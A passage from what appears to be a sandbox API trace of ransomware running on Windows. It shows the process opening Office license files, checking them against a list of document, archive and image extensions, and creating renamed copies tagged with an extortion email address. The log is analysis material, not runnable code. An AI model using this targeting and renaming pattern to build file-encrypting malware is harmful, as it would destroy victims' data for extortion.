dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.849] CloseHandle (hObject=0x434) returned 1 [0163.850] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.850] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.850] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial5-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial5-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.114] CloseHandle (hObject=0x434) returned 1 [0164.115] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.115] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.115] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_trial-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.115] CloseHandle (hObject=0x434) returned 1 [0164.116] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.117] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.117] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_trial-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.117] CloseHandle (hObject=0x434) returned 1 [0164.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-ppd.xrm-ms") returned 76 [0164.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-ppd.xrm-ms") returned 76 [0164.117] lstrlenW (lpString=".doc") returned 4 [0164.117] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0164.118] lstrlenW (lpString=".docx") returned 5 [0164.118] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0164.118] lstrlenW (lpString=".pdf") returned 4 [0164.118] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0164.118] lstrlenW (lpString=".xls") returned 4 [0164.118] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0164.118] lstrlenW (lpString=".xlsx") returned 5 [0164.118] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0164.118] lstrlenW (lpString=".ppt") returned 4 [0164.118] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0164.118] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-ppd.xrm-ms") returned 76 [0164.118] lstrlenW (lpString=".zip") returned 4 [0164.118] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0164.118] lstrlenW (lpString=".rar") returned 4 [0164.118] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0164.118] lstrlenW (lpString=".bz2") returned 4 [0164.118] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0164.118] lstrlenW (lpString=".7z") returned 3 [0164.118] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0164.118] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-ppd.xrm-ms") returned 76 [0164.118] lstrlenW (lpString=".dbf") returned 4 [0164.118] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0164.118] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-ppd.xrm-ms") returned 76 [0164.118] lstrlenW (lpString=".1cd") returned 4 [0164.118] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0164.118] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-ppd.xrm-ms") returned 76 [0164.118] lstrlenW (lpString=".jpg") returned 4 [0164.119] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0164.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-ppd.xrm-ms") returned 76 [0164.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-ppd.xrm-ms") returned 76 [0164.119] lstrlenW (lpString=".doc") returned 4 [0164.119] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0164.119] lstrlenW (lpString=".docx") returned 5 [0164.119] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0164.119] lstrlenW (lpString=".pdf") returned 4 [0164.119] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0164.119] lstrlenW (lpString=".xls") returned 4 [0164.119] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0164.119] lstrlenW (lpString=".xlsx") returned 5 [0164.119] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0164.119] lstrlenW (lpString=".ppt") returned 4 [0164.119] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0164.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-ppd.xrm-ms") returned 76 [0164.119] lstrlenW (lpString=".zip") returned 4 [0164.119] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0164.119] lstrlenW (lpString=".rar") returned 4 [0164.119] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0164.119] lstrlenW (lpString=".bz2") returned 4 [0164.119] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0164.119] lstrlenW (lpString=".7z") returned 3 [0164.119] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0164.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-ppd.xrm-ms") returned 76 [0164.119] lstrlenW (lpString=".dbf") returned 4 [0164.119] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0164.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-ppd.xrm-ms") returned 76 [0164.120] lstrlenW (lpString=".1cd") returned 4 [0164.120] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0164.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-ppd.xrm-ms") returned 76 [0164.120] lstrlenW (lpString=".jpg") returned 4 [0164.120] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0164.120] lstrcmpiW (lpString1=".xrm-ms", lpString2=".bat") returned 1 [0164.120] lstrlenW (lpString="PersonalR_Trial-ul-oob.xrm-ms") returned 29 [0164.120] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_trial-ul-oob.xrm-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0164.121] GetFileSizeEx (in: hFile=0x434, lpFileSize=0x307ff14 | out: lpFileSize=0x307ff14*=11601) returned 1 [0164.121] CloseHandle (hObject=0x434) returned 1 [0164.121] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_trial-ul-oob.xrm-ms")) returned 0x220 [0164.121] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_trial-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0164.121] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_trial-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0164.121] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.121] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.121] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_trial-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.124] CloseHandle (hObject=0x434) returned 1 [0164.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-ul-oob.xrm-ms") returned 79 [0164.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-ul-oob.xrm-ms") returned 79 [0164.124] lstrlenW (lpString=".doc") returned 4 [0164.124] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0164.124] lstrlenW (lpString=".docx") returned 5 [0164.124] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0164.124] lstrlenW (lpString=".pdf") returned 4 [0164.124] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0164.124] lstrlenW (lpString=".xls") returned 4 [0164.124] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0164.125] lstrlenW (lpString=".xlsx") returned 5 [0164.125] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0164.125] lstrlenW (lpString=".ppt") returned 4 [0164.125] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0164.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-ul-oob.xrm-ms") returned 79 [0164.125] lstrlenW (lpString=".zip") returned 4 [0164.125] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0164.125] lstrlenW (lpString=".rar") returned 4 [0164.125] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0164.125] lstrlenW (lpString=".bz2") returned 4 [0164.125] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0164.125] lstrlenW (lpString=".7z") returned 3 [0164.125] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0164.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-ul-oob.xrm-ms") returned 79 [0164.125] lstrlenW (lpString=".dbf") returned 4 [0164.125] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0164.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-ul-oob.xrm-ms") returned 79 [0164.125] lstrlenW (lpString=".1cd") returned 4 [0164.125] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0164.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-ul-oob.xrm-ms") returned 79 [0164.125] lstrlenW (lpString=".jpg") returned 4 [0164.125] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0164.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-ul-oob.xrm-ms") returned 79 [0164.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-ul-oob.xrm-ms") returned 79 [0164.125] lstrlenW (lpString=".doc") returned 4 [0164.126] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0164.126] lstrlenW (lpString=".docx") returned 5 [0164.126] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0164.126] lstrlenW (lpString=".pdf") returned 4 [0164.126] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0164.126] lstrlenW (lpString=".xls") returned 4 [0164.126] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0164.126] lstrlenW (lpString=".xlsx") returned 5 [0164.126] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0164.126] lstrlenW (lpString=".ppt") returned 4 [0164.126] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0164.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-ul-oob.xrm-ms") returned 79 [0164.126] lstrlenW (lpString=".zip") returned 4 [0164.126] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0164.126] lstrlenW (lpString=".rar") returned 4 [0164.126] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0164.126] lstrlenW (lpString=".bz2") returned 4 [0164.126] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0164.126] lstrlenW (lpString=".7z") returned 3 [0164.126] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0164.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-ul-oob.xrm-ms") returned 79 [0164.126] lstrlenW (lpString=".dbf") returned 4 [0164.126] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0164.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-ul-oob.xrm-ms") returned 79 [0164.126] lstrlenW (lpString=".1cd") returned 4 [0164.126] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0164.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-ul-oob.xrm-ms") returned 79 [0164.127] lstrlenW (lpString=".jpg") returned 4 [0164.127] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0164.127] lstrcmpiW (lpString1=".xrm-ms", lpString2=".bat") returned 1 [0164.127] lstrlenW (lpString="pkeyconfig-office.xrm-ms") returned 24 [0164.127] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\pkeyconfig-office.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0164.127] GetFileSizeEx (in: hFile=0x434, lpFileSize=0x307ff14 | out: lpFileSize=0x307ff14*=590523) returned 1 [0164.128] CloseHandle (hObject=0x434) returned 1 [0164.128] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\pkeyconfig-office.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\pkeyconfig-office.xrm-ms")) returned 0x220 [0164.128] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\pkeyconfig-office.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\pkeyconfig-office.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0164.128] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\pkeyconfig-office.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0164.128] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.128] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.128] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\pkeyconfig-office.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\pkeyconfig-office.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.128] CloseHandle (hObject=0x434) returned 1 [0164.129] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\pkeyconfig-office.xrm-ms") returned 74 [0164.129] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\pkeyconfig-office.xrm-ms") returned 74 [0164.129] lstrlenW (lpString=".doc") returned 4 [0164.129] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0164.129] lstrlenW (lpString=".docx") returned 5 [0164.129] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0164.129] lstrlenW (lpString=".pdf") returned 4 [0164.129] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0164.129] lstrlenW (lpString=".xls") returned 4 [0164.129] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0164.129] lstrlenW (lpString=".xlsx") returned 5 [0164.129] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0164.129] lstrlenW (lpString=".ppt") returned 4 [0164.129] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0164.129] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\pkeyconfig-office.xrm-ms") returned 74 [0164.129] lstrlenW (lpString=".zip") returned 4 [0164.129] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0164.129] lstrlenW (lpString=".rar") returned 4 [0164.129] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0164.129] lstrlenW (lpString=".bz2") returned 4 [0164.129] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0164.129] lstrlenW (lpString=".7z") returned 3 [0164.129] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0164.129] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\pkeyconfig-office.xrm-ms") returned 74 [0164.129] lstrlenW (lpString=".dbf") returned 4 [0164.129] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0164.129] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\pkeyconfig-office.xrm-ms") returned 74 [0164.129] lstrlenW (lpString=".1cd") returned 4 [0164.129] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0164.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\pkeyconfig-office.xrm-ms") returned 74 [0164.130] lstrlenW (lpString=".jpg") returned 4 [0164.130] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0164.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\pkeyconfig-office.xrm-ms") returned 74 [0164.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\pkeyconfig-office.xrm-ms") returned 74 [0164.130] lstrlenW (lpString=".doc") returned 4 [0164.130] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0164.130] lstrlenW (lpString=".docx") returned 5 [0164.130] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0164.130] lstrlenW (lpString=".pdf") returned 4 [0164.130] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0164.130] lstrlenW (lpString=".xls") returned 4 [0164.130] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0164.130] lstrlenW (lpString=".xlsx") returned 5 [0164.130] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0164.130] lstrlenW (lpString=".ppt") returned 4 [0164.130] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0164.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\pkeyconfig-office.xrm-ms") returned 74 [0164.130] lstrlenW (lpString=".zip") returned 4 [0164.130] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0164.130] lstrlenW (lpString=".rar") returned 4 [0164.130] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0164.130] lstrlenW (lpString=".bz2") returned 4 [0164.130] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0164.130] lstrlenW (lpString=".7z") returned 3 [0164.130] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0164.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\pkeyconfig-office.xrm-ms") returned 74 [0164.130] lstrlenW (lpString=".dbf") returned 4 [0164.130] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0164.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\pkeyconfig-office.xrm-ms") returned 74 [0164.130] lstrlenW (lpString=".1cd") returned 4 [0164.130] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0164.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\pkeyconfig-office.xrm-ms") returned 74 [0164.131] lstrlenW (lpString=".jpg") returned 4 [0164.131] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0164.131] lstrcmpiW (lpString1=".xrm-ms", lpString2=".bat") returned 1 [0164.131] lstrlenW (lpString="PowerPointR_Grace-ppd.xrm-ms") returned 28 [0164.131] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_grace-ppd.xrm-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0164.131] GetFileSizeEx (in: hFile=0x434, lpFileSize=0x307ff14 | out: lpFileSize=0x307ff14*=20779) returned 1 [0164.131] CloseHandle (hObject=0x434) returned 1 [0164.131] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_grace-ppd.xrm-ms")) returned 0x220 [0164.132] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_grace-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0164.132] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_grace-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0164.132] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.133] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.133] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_grace-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.133] CloseHandle (hObject=0x434) returned 1 [0164.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ppd.xrm-ms") returned 78 [0164.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ppd.xrm-ms") returned 78 [0164.133] lstrlenW (lpString=".doc") returned 4 [0164.133] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0164.133] lstrlenW (lpString=".docx") returned 5 [0164.133] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0164.133] lstrlenW (lpString=".pdf") returned 4 [0164.133] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0164.133] lstrlenW (lpString=".xls") returned 4 [0164.133] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0164.133] lstrlenW (lpString=".xlsx") returned 5 [0164.133] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0164.133] lstrlenW (lpString=".ppt") returned 4 [0164.133] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0164.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ppd.xrm-ms") returned 78 [0164.133] lstrlenW (lpString=".zip") returned 4 [0164.133] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0164.134] lstrlenW (lpString=".rar") returned 4 [0164.134] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0164.134] lstrlenW (lpString=".bz2") returned 4 [0164.134] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0164.134] lstrlenW (lpString=".7z") returned 3 [0164.134] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0164.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ppd.xrm-ms") returned 78 [0164.134] lstrlenW (lpString=".dbf") returned 4 [0164.134] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0164.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ppd.xrm-ms") returned 78 [0164.134] lstrlenW (lpString=".1cd") returned 4 [0164.134] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0164.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ppd.xrm-ms") returned 78 [0164.134] lstrlenW (lpString=".jpg") returned 4 [0164.134] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0164.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ppd.xrm-ms") returned 78 [0164.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ppd.xrm-ms") returned 78 [0164.134] lstrlenW (lpString=".doc") returned 4 [0164.134] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0164.134] lstrlenW (lpString=".docx") returned 5 [0164.134] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 